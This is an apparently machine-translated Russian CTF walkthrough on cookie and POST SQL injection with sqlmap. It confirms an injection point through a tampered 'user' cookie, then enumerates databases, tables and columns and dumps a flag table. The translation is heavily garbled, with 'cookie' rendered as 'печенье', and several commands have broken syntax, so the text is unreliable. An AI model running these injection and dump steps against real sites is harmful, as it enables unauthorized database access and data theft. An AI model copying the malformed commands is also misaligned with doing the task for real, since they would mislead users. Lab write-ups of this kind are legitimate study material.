каталог
- sqlmap Почты инъекции
- базы данных инъекции насилие печенья
после инъекции
1. Проверьте наличие инъекции
Нормальные пакеты данных « куки: Пользователь Пользователь =» изменить « куки: Пользователь ADMIN =» Сообщение будет отображаться параметры флага
Проверка файлов cookie: пользователь = администратора «и» 1 «= 1» ошибка, нет эха флага, иллюстрируют это положение существует инъекции
2. Скопируйте запись Сохранить как файл 1.txt
>> Вот инъекции модифицированного печенья, затем инъекции печенья зрения сочетать принципы после инъекции, на самом деле, два из которых должны быть введены в сустав, независимо друг от друга.
инъекции печенья
Так называемая после инъекции посылает запрос POST к коммутации пакетов инъекции, инъекция куки, чтобы изменить информацию печенья, чтобы замаскировать идентичность или что инфильтрат в качестве точки впрыска
базы данных 1. штормы
> Sqlmap -r -p 1.txt --cookie = "пользователь = администратора" -p пользователя --level 2 --string = "флаг" --dbms = MySQL --dbs
>> Вы можете видеть, что есть четыре базы данных
POST файл 1.txt здесь, чтобы написать местоположение файла, такие как: /root/1.txt
печенье быть написано: - печенье = «пользователь = администратор»
--string параметров, результат используется для определения символа, если страница содержит, не содержит этот символ будет оцениваться как ложные: - строка = «флаг» представляет собой правильное слово, когда эхо флага
Укажите тип базы данных: - DBMS = MySQL
База данных Сторм: - д.б.н.
Таблица 2. Guess
> sqlmap -r -p 1.txt --cookie = "пользователь = администратора" -p пользователя --level 2 --string = "флаг" --dbms = MySQL -D --tables сотрудника
Есть три таблицы базы данных >> догадка работник при
:-D угадать имя таблицы базы данных для конкретной базы данных
Угадайте таблицу: - таблицы
Другие параметры без изменений
3. Угадайте столбцы таблицы fllaagg
> Sqlmap -r -p 1.txt --cookie = "пользователь = администратора" -p пользователь --level 2 --string = "флаг" --dbms = MySQL -D сотрудник -T fllaagg --columns
Угадайте столбцы для указания базы данных, базы данных таблицы :-D -T Листок
Угадайте Колонка: - столбцы
4. угадать поля в таблице
> Sqlmap -r -p 1.txt - -cookie = "пользователь = администратора" -p пользователь --level 2 --string = "флаг" --dbms = MySQL -D сотрудник -T fllaagg "флаг" --dump
>> находка поле содержит флаг
Угадайте поле для указания базы данных, таблицы, содержание базы данных :-D -T Data Sheet «Содержание»
Угадайте поле: - дамп
Же метод может просмотреть содержимое других баз данных, таблицы, точка инжекции и тот же метод, где точка инжекции из пакета данных измененных данных печенья. Если присутствуют данные, сам пакет POST непосредственно впрыскивается после инъекции, инъекции не могут добавлять печенья --cookie «пользователь = администратора», как этот параметр.